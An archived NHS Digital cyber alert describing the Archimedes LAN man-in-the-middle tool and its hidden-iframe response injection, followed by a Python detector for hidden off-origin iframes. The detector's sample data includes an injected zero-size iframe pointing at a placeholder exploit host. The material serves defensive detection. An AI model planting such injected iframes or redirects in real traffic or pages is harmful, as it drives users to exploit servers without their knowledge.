Archimedes - Malware Platform
This content has been archived
This article no longer conforms to NHS Digital's standards for cyber alerts, and may contain outdated or inaccurate information. Use of the information contained in this page is at your own risk.
Summary
Affected platforms
The following platforms are known to be affected:
Threat details
Archimedes is a tool for attacking systems inside a Local Area Network (LAN). According to researchers, it redirects a target system's LAN traffic through a host the attacker controls, so that the traffic can be intercepted and altered before it reaches its intended destination.
Using this position, the malware injects a counterfeit web server response into the target's browsing session. The injected response redirects the browser to a destination chosen by the attacker, typically an exploit server, while the session continues to look like normal browsing to the user.
The user guide for Archimedes refers to the malware as an updated version of another tool named 'Fulcrum'. Archimedes offers several improvements on the previous tool.
There are four known versions of Archimedes (1.0, 1.1, 1.2 and 1.3). Each new version adds functionality but does not change the default behaviour of the original tool.
The changes introduced across these versions include:
Disable the route verification check that occurs prior to exploitation.
Support for a new HTTP injection method based on a hidden iframe.
Modification of the DLLs to support a 'Fire and Forget' methodology.
Provide a method for the attacker to shut down the tool on demand.
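The injected response described above, and the hidden-iframe injection method listed among the version changes, leave a recognisable trace in the HTTP response the browser receives: an iframe that is sized or styled so the user cannot see it and whose source is on a different host from the one the user requested. The following Python check is an added example for this advisory, not code from Archimedes or from NHS Digital. It operates on raw HTTP response bytes already extracted from a capture (the capture handling is out of scope), and the response bodies and hostnames in it are constructed samples.

```python
"""Flag HTTP responses carrying a hidden <iframe> that points off-origin.

Added detection example for the injected-response behaviour described in
the advisory. Not Archimedes code; operates on constructed sample data.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS patterns commonly used to keep an element out of the rendered page.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # HTMLParser lowercases attribute names; a valueless attribute
            # such as bare `hidden` arrives with value None.
            self.iframes.append({k: (v or "") for k, v in attrs})


def _is_hidden(attrs):
    """True if the iframe is hidden via attribute, CSS, or zero/one-pixel size."""
    if "hidden" in attrs:
        return True
    if HIDDEN_STYLE.search(attrs.get("style", "")):
        return True
    dims = (
        attrs.get("width", "").strip().lower().removesuffix("px"),
        attrs.get("height", "").strip().lower().removesuffix("px"),
    )
    return any(d in ("0", "1") for d in dims)


def find_hidden_offsite_iframes(response_bytes, request_host):
    """Return src URLs of hidden iframes whose host differs from request_host.

    response_bytes: a complete, uncompressed HTTP/1.x response.
    request_host:   the Host header value the client sent for this response.
    """
    head, _, body = response_bytes.partition(b"\r\n\r\n")
    header_lines = head.decode("latin-1").split("\r\n")
    content_type = ""
    for line in header_lines[1:]:  # skip the status line
        if line.lower().startswith("content-type:"):
            content_type = line.split(":", 1)[1].strip().lower()
            break
    if not content_type.startswith("text/html"):
        return []  # iframe injection only matters in HTML responses

    parser = _IframeCollector()
    parser.feed(body.decode("utf-8", errors="replace"))

    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        src_host = urlparse(src).hostname  # None for relative URLs (same origin)
        if src_host and src_host.lower() != request_host.lower() and _is_hidden(attrs):
            hits.append(src)
    return hits


# Constructed sample responses; the hostnames are placeholders, not real sites.
INJECTED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"<html><body><h1>Welcome</h1>"
    b'<iframe src="http://exploit.example/land" width="0" height="0"></iframe>'
    b"</body></html>"
)

BENIGN_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><body>"
    b'<iframe src="/help/embed" width="600" height="400"></iframe>'
    b'<iframe src="https://intranet.example/video" style="display:none"></iframe>'
    b"</body></html>"
)

if __name__ == "__main__":
    print(find_hidden_offsite_iframes(INJECTED_RESPONSE, "intranet.example"))
    print(find_hidden_offsite_iframes(BENIGN_RESPONSE, "intranet.example"))
```

The check deliberately requires both conditions, hidden and off-origin, so a visible embedded page or a hidden same-origin frame is not reported. It assumes the body is uncompressed; if the capture shows `Content-Encoding: gzip`, decompress the body before calling it, and note that an attacker injecting a whole response can equally omit compression.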
Remediation steps
Last edited: 17 February 2020 11:27 am